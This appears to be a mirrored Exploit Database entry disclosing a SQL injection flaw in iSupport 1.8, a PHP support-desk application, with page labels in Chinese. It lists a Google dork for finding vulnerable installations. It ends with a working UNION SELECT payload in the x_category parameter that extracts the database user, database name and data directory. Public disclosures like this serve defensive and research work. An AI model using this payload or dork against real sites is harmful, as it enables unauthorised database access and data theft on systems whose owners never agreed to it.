iSupport 1.8 – SQL Injection

• Exploit Database
• 18 阅读

• 作者： Brendan Coles
  日期： 2011-06-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17436/

• iSupport 1.8 SQL Injection Vulnerability
  
  # Date: 2011-06-23
  # Author: Brendan Coles <bcoles@gmail.com>
  # Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/
  
  # Software: iSupport
  # Version: <= 1.8
  # Homepage: http://www.idevspot.com/iSupport.php
  # Google Dork: "Powered by [ iSupport 1.8 ]"
  
  # Vendor: idevSpot
  # Homepage: http://www.idevspot.com/
  # Notified: Unnotified
  
  # SQL Injection:
  
  http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--